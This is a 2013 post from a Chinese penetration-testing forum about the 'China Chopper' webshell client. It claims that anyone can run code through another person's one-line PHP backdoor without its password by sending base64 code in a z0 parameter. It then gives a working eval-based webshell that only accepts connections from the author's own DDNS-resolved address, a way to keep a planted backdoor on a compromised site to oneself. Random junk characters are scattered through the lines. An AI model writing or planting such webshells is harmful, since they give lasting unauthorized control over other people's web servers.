中国网络渗透测试联盟

标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页]
作者: admin    时间: 2013-7-26 12:45
标题: 中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
; g: O  i8 C' e0 T& @
- N& u' B4 ^* Q+ O( _! Y7 L( P* M就算你设置了密码,使用了eval($_REQUEST['moyo']);
& T2 r9 d, o8 J4 f/ r/ P, Q6 {% q5 C( a+ w# y4 ^2 m
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门, j5 W* R$ U% [  c' K

  i* {1 F5 [: }) _4 c因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
7 v# l- L  E2 o* b. S5 ~0 u& w# E. g. @4 a) |6 C9 E2 @; n' i
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了; Q( f* W* D) p. e. l! z

7 |- s& s, M( h' B4 L2 s) G: o不知道是设计缺陷还是故意留的后门7 t, v- L2 ]4 f3 Y( z9 Z$ A. `7 W
6 s; V9 h& F( m; g: u8 N/ Q5 F. w
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用: S2 n7 n2 g+ e- u

5 K, a8 @. M+ W本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
$ w# u+ T. }$ _9 N0 J
9 o6 s9 x0 F, x, @然后一句话后门这样写
( o, W" E" r' f5 P# h9 u5 O0 ~2 a' E* |
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>, \5 v& K0 ?$ m3 G( g! N
这样就可以让一句话后门只允许自己的电脑连接了
' L( C& i0 ?5 k: R( R" C: d" a
* l; L! [4 X. o# a1 L0 |



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2